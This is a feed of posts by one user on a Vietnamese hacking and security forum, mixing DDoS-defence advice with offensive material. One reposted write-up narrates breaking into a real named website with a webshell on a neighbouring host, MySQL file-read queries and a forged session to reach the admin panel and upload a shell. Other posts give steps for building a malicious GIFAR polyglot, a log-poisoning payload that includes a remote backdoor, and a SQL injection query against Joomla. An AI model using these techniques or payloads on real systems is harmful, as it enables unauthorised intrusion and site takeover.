<![CDATA[Messages posted by "flier_vn"]]> /hvaonline/posts/listByUser/174195.html JForum - http://www.jforum.net Cách kiểm tra các thao tác copy, cut ... trên máy của mình /hvaonline/posts/preList/38589/236837.html#236837 /hvaonline/posts/preList/38589/236837.html#236837 GMT web của mình tự động gửi request đến ssh101.com - có phải bị xâm nhập? /hvaonline/posts/preList/38604/236836.html#236836 /hvaonline/posts/preList/38604/236836.html#236836 GMT xin giúp về bảo mật diễn đàn VBB /hvaonline/posts/preList/38630/236835.html#236835 /hvaonline/posts/preList/38630/236835.html#236835 GMT Đăng nhập regedit bị từ chối bởi yêu cầu mật khẩu ? /hvaonline/posts/preList/32631/203827.html#203827 /hvaonline/posts/preList/32631/203827.html#203827 GMT đây là loại ddos gì và giúp em cách khắc phục lúc thì ip này lúc thì ip kia không chặn hết được không biết có phần mềm nào tự band ip khi request quá nhiều không nhỉ   Bạn có thể dùng Mod_Security của apache và Iptables của Linux Kernel. Còn với mớ log trên kia, rất có khả năng bạn bị xFlash DDoS. Nó send nhìu request dạng POST khống đến site của bạn, vì là post khống nên đều bị trả về 404 ( not found ) nhưng Server vẫn phải sử lý -> theo time và số lượng Serv của bạn bị ùn tắt :D Good luck !]]> /hvaonline/posts/preList/29820/183889.html#183889 /hvaonline/posts/preList/29820/183889.html#183889 GMT Chống DOS bằng cho php script nhờ kết hợp với memcache.

myquartz wrote:
Hi! Thấy vài member thảo luận về code chống DOS. Tớ góp 1 tí cho vui. Đây là đoạn code tớ đã áp dụng 1 cho 1 site của tớ, nó có khoảng 5000 keep-alive session, 10K IP khác nhau truy cập hàng ngày, site cung cấp thông tin trực tuyến nên mỗi client request khoảng 5-7 giây 1 lần, với 18-20 triệu hit/ngày (cường độ khá kinh khủng đấy). code này áp dụng cho php. Phải kết hợp với memcache để đảm bảo tốc độ (1 ứng dụng khá là ... hay đấy). Nếu dùng mysql cũng đc, với memory table, nhưng ko hay lắm vì mysql nhiều overhead hơn nên chậm hơn. Code:
$antiflood = 4; // anti-flooding protect time in seconds.

	[b][color=yellow]$MCobj = new Memcache;[/color][/b]
	if(!$MCobj->pconnect($MCHost, 11211))
		$MCHost = null;
	else if($debug) echo "<debug>Connected to cached</debug>";

//Anti flooding
$pattern = '/^(10\.|192\.168\.|127\.)/';
if($MCobj && !preg_match($pattern,$_SERVER['REMOTE_ADDR'])) {
        $protectedkey = 'ip'.$_SERVER['REMOTE_ADDR'].'-'.$_SERVER['SCRIPT_FILENAME'];
	$isquery = $MCobj->get($protectedkey);

	if($isquery) { // query too fast
		echo 'Server too busy, please visit later.;
		exit();
	}
	$MCobj->set($protectedkey, 1, 0, $antiflood);
}
Chúc các bạn thành công. 
Mình vẫn chưa thấy Class Memcache... ? Bạn giải thick rõ hơn về đoạn code trên được ko ? Vd như Memcache được gọi ra từ đâu ?]]>
/hvaonline/posts/preList/29792/183888.html#183888 /hvaonline/posts/preList/29792/183888.html#183888 GMT
Hỏi Về Tấn Công Dos Bằng Flash.

khovingu89 wrote:
lên google tìm kiến thức botnet đấy từ căn bản đến nâng cao và sem mấy video họ hướng dẫn điểu khiển botnet 
Lại 1 lần nữa mình lại nhắc bạn, trước tiên nên tốt về chính tả rồi sau đó học lập trình rồi mới vào phát bỉu :D Nhé bạn]]>
/hvaonline/posts/preList/29677/183887.html#183887 /hvaonline/posts/preList/29677/183887.html#183887 GMT
Hướng dẫn khai thác SQL Injection đối với MySQL

khovingu89 wrote:
SQL bị lỗi hack cũng giễ thôi mà khó là khó cái đoạn crack md5 và tìm link admin 
:D Đúng là "Giễ" ! Bạn nên xem lại chính tả và học nhìu hơn về lập trình rồi hẳn tham gia phát bỉu ! Chân thành đấy ;)]]>
/hvaonline/posts/preList/25210/183886.html#183886 /hvaonline/posts/preList/25210/183886.html#183886 GMT
Re: [Thảo luận] khai thác lỗi XSS /hvaonline/posts/preList/20805/178894.html#178894 /hvaonline/posts/preList/20805/178894.html#178894 GMT Re: Chiếm được quyền Router rồi thì nên làm gì? /hvaonline/posts/preList/27327/167353.html#167353 /hvaonline/posts/preList/27327/167353.html#167353 GMT Re: Hỏi Về Chiếm Hữu Phiên Làm Việc /hvaonline/posts/preList/27225/167352.html#167352 /hvaonline/posts/preList/27225/167352.html#167352 GMT Re: Hỏi Về Chiếm Hữu Phiên Làm Việc Tóm tắt quá trình hack athena.com.vn (Local attack) Bỏ qua mấy giai đoạn lặt vặt bây giờ làm việc với trường hợp đã có sẵn con webshell //http://12a6dh.info/forum/cache/skin_cache/cacheid_2/skin_public.php Chạy con backdoor trên kết nối vào mysql của 12a6 sau đó tiến hành lấy sources của athena. Trong trường hợp này xác định link của trang quản trị là /admin nên chỉ chú trọng vào việc lấy code của các file liên quan đến cái này thui (khi nào có con backdoor trên host của nó rùi lấy tiếp). Lấy code bằng mấy câu query sau: CREATE TABLE test(text LONGTEXT); load data local infile 'path/file' into table test FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '\'' LINES TERMINATED BY '\n'; Có code rùi thì ngồi đọc nó, trước hết là thằng index.php session_start(); // quản lý bằng session chứ ko phải bằng cookie, có nghĩa là khi ta vào link admin nó sẽ tạo cho ta một phiên làm việc, phiên làm việc này sẽ được server tạo ra và lưu vào file sess_...... (VD: sess_2d193503319fefd5a48b208d48b69d36) nằm trên server, mặc định của phiên làm việc này là ko hợp lệ nhưng nếu ta đăng nhập thành công thì server sẽ chỉnh sửa file sess_ kia thành hợp lệ (hack được athena phải cảm ơn thằng này nhiều ). Tiếp tục nào case 'login' : include "_login.php"; break; thằng index sơ sơ như vậy là được rùi bây giờ chuyển sang thằng _login.php if (isset($_POST['txtUsername'])) $admin_user=$_POST['txtUsername']; else $admin_user=''; if (isset($_POST['txtPassword'])) $admin_pass=$_POST['txtPassword']; else $admin_pass=''; if (isset($_POST['txtPassSec'])) $admin_sec=$_POST['txtPassSec']; else $admin_sec=''; hô hô user, pass1, pass2. $admin_sec = md5(base64_encode($admin_sec)); if ($admin_sec == "53f8797e875fb1b667c86e4ae15cee24") { if ( (!empty($admin_user)) && (!empty($admin_pass)) ) { $admin_pass = md5($admin_pass); $query = "select * from admin WHERE username='$admin_user' AND password='$admin_pass'"; ặc ặc cái pass2 của nó vừa base64_encode vừa md5, nó mà đặt pass dài xíu là ngồi decode đù người luôn mà chưa chắc gì có kết quả, còn cái pass1 cũng bị md5 luôn. Có 2 cách giải quyết được đặt ra, thứ nhất là dò 2 cái pass của nó, thứ 2 là fake cookie. Cách thứ nhất ko chơi, ngu gì mà ngồi dò pass trong khi cách thứ 2 có vẻ dễ ăn hơn và khả năng thành công cũng cao hơn. Hồi nãy coi file index thấy nó quản lý phiên làm việc bằng session coi bộ ngon ăn. Vậy là quyết định chọn cách 2. Có 2 hướng giải quyết cho cách 2: + Thứ nhất là khi ta mở trang index.php ra nó sẽ tạo cho ta một session trên server, công việc của ta là tìm cách edit cái phiên làm việc sao cho nó trở thành hợp lệ. Coi cái phpinfo() của nó xem nào session.save_path=/tmp. Ok rùi mở cái thư mục /tmp coi thử có gì trong đó. Ặc ặc …. bị access denied rùi coi bộ hướng đi này ko ổn, chuyển hướng đi thui. + Thứ hai nếu ta edit cái file session ko được thì tại sao ta ko tạo ra một cái file session mới hợp lệ với cái source đã có kia rùi fake cookie của web browser với cái session mới đó. Vậy là đã xác định được chính xác hướng đi và những cái cần phải làm, công việc tiếp theo là up sources của athena lên host 12a6, edit lại cái pass2 trong file _login.php, edit cái pass1 trong db của nó, xong rùi login nào … vừng ơi mở ra…. bùm vào được admin control panel rùi (cái này là đồ giả nằm trên host của 12a6) vào phần quản lý cookie của web browsers (opera) coi thử cái session của nó là gì nào, copy nó lại bây giờ chuyển qua thằng athena fake bằng cái session đó, refresh lại nào …. bùm …. he he heeeeee vào được admin control panel của athena rùi (hàng thật chất lượng cao ), tìm chỗ up con shell….. GAME OVER Author: longnhi(HCE)   ]]> /hvaonline/posts/preList/27225/166876.html#166876 /hvaonline/posts/preList/27225/166876.html#166876 GMT Re: Storm7Shell là gì các bạn ? Web mình dính con này Ủa, làm sao bạn biết IP đó ? Mình giấu IP rồi mà ?   Chắc nhìn vào cái OS và số đầu của IP nên đoán ra thôi! ko có gì lạ cả ! Bạn xem kĩ lại các log HTTP REQUEST xem có dấu bị của Sql injection ko ? Rồi xem lại logs FTP xem, có dấu hiệu bị lộ pass ko ? Nếu sài Sharehosting nên tình trạng bị Local attack cũng rất nhiều ! set permiss của các folder cho kĩ lại, rồi check lại source xem có dấu hiệu của sql injection ko ! Nhất là mấy cái Input :) Good luck ! ]]> /hvaonline/posts/preList/27204/166169.html#166169 /hvaonline/posts/preList/27204/166169.html#166169 GMT Re: help mình về lỗi sql ịnection /hvaonline/posts/preList/25842/157534.html#157534 /hvaonline/posts/preList/25842/157534.html#157534 GMT Re: help mình về lỗi sql ịnection /hvaonline/posts/preList/25842/157501.html#157501 /hvaonline/posts/preList/25842/157501.html#157501 GMT Re: Khai thác và phòng chống file upload trong PHP Web Applications

mrro wrote:
@flier_vn: khổ bạn quá, gì mà từa lưa hết, chỗ này xọ chỗ kia. ngồi xem lại xem java applet là cái chi rồi hẵng coi cái GIFAR này là cái chi, kẻo bị tẩu hỏa nhập ma thì chẳng có ai cứu được đâu. --m 
Ừhm ! Em xin lỗi, em sẽ rút kinh nghiệm, lần sau khi tham gia chủ đề nào đó thì em phải chắc chắn rằng em am hiểu 1 chút kiến thức về chủ đề đó thì mới dám mở miệng tham gia :D Thx anh rất nhiều.. ! àh ! Riêng về cái này thì thx anh nbthanh đã giúp em hiểu phần nào rồi :) Còn đây em xin post cách tạo file GIFAR.gif ( cũng như tương tự ) dành cho những bạn chưa biết :
1. Xoạn thảo 1 file java chứa mã độc rồi complie lại : $ : javac exp1.java rồi : $: jar -cf exp1.jar exp1.class => tạo file .JAR Tiếp : $ : cat xxx.gif exp1.jar > gifar.gif  
Okies! Thành công :D To mrror : Nhưng.... cái lối nói chuyện của anh thì hok bik sau này anh dạy con, dạy cháu anh sao nữa, thậm chí bây giờ nếu đoán ko lầm chắc bạn bè anh chỉ đếm đầu ngón tay ! hahaha ! Muốn chỉ bảo ai thì cũng phải làm cho người đó phục trước đã ! Từng lời lẽ phát ra phải làm cho người ta "mến" và phục, như reply như anh nbt_thanh thì làm gì có ai dám mở miệng nào tiếng nào ! hahaha ! Hok biết mỗi lần bro phát ngôn ra là lại có người chỉ chữi, mặc dù cũng có rất nhiều anh cũng hay châm chọt, nhưng châm chọt của họ là để giúp cho mình tiến bộ nên mọi người cũng rất hài lòng ! Bro mới là người coi chứng bị tẫu quả nhập ma, riết hok có ai chơi với mình thì bị tẫu quả thiệt đó ! haha ! to all : có gì sai thì move wa box tán gẫu, vì ko có lý do gì để cho vào thùng rác :) ]]>
/hvaonline/posts/preList/25298/153642.html#153642 /hvaonline/posts/preList/25298/153642.html#153642 GMT
Re: Khai thác và phòng chống file upload trong PHP Web Applications /hvaonline/posts/preList/25298/153565.html#153565 /hvaonline/posts/preList/25298/153565.html#153565 GMT Re: Khai thác và phòng chống file upload trong PHP Web Applications /hvaonline/posts/preList/25298/153559.html#153559 /hvaonline/posts/preList/25298/153559.html#153559 GMT Re: Hướng dẫn khai thác SQL Injection đối với MySQL /hvaonline/posts/preList/25210/153488.html#153488 /hvaonline/posts/preList/25210/153488.html#153488 GMT [Thảo luận] Khai thác lỗi này như thế nào ?!

gamma95 wrote:
thực ra đề bài QVT cho là thừa dữ kiện, và cái ?html=/home/hostings/webs/victim.net/logs/access_log của đống chí gsmth có cách nào đơn giản hơn ko ?? và cách inject code backdoor vào, có cách nào inject khôn hơn tụi tây kia nói ko?? 
Có cách nào đơn giản hơn thì em hem bik :D
và cách inject code backdoor vào, có cách nào inject khôn hơn tụi tây kia nói ko?? 
Còn cái này thì em nghĩ là : <? include ('http://link/backdoor.php'); /* ?> or ? include ('$xxx'); /* ?> ! ít nhất thì cũng hay hơn bọn tây kia inject :D ==> ?html=/home/hostings/webs/victim.net/logs/access_log?xxx=[link] <--- loại được các cái thừa ko cần đến mà log ghi lại !]]>
/hvaonline/posts/preList/12888/149782.html#149782 /hvaonline/posts/preList/12888/149782.html#149782 GMT
Re: Một số câu hỏi về bảo mật. /hvaonline/posts/preList/24607/148746.html#148746 /hvaonline/posts/preList/24607/148746.html#148746 GMT Re: Thắc mắc thâm nhập vs hack /hvaonline/posts/preList/24611/148745.html#148745 /hvaonline/posts/preList/24611/148745.html#148745 GMT Re: Làm sao để gởi 1 gói tin chứa IP tới apache server /hvaonline/posts/preList/24395/147407.html#147407 /hvaonline/posts/preList/24395/147407.html#147407 GMT Re: 05 Bước khai thác Joomla 1.5.x (Remote Admin Password Change ) Code:
$db->setQuery("SELECT id FROM #__users WHERE block = 0 AND activation =".$db->Quote($token)."'");
là đủ rùi ! Mà nếu là sql injection thì sao ko thử : SELECT id FROM jos_users WHERE block = 0 AND activation = '' union select xxx from jos_uers where activation='' liệu có được ko nhĩ ?]]>
/hvaonline/posts/preList/24333/147060.html#147060 /hvaonline/posts/preList/24333/147060.html#147060 GMT
Re: cho hõi về lấy bộ HTTP HEADER = PHP /hvaonline/posts/preList/24316/146795.html#146795 /hvaonline/posts/preList/24316/146795.html#146795 GMT cho hõi về lấy bộ HTTP HEADER = PHP /hvaonline/posts/preList/24316/146790.html#146790 /hvaonline/posts/preList/24316/146790.html#146790 GMT Cho em hõi tí về SQL Injection ! /hvaonline/posts/preList/23538/141803.html#141803 /hvaonline/posts/preList/23538/141803.html#141803 GMT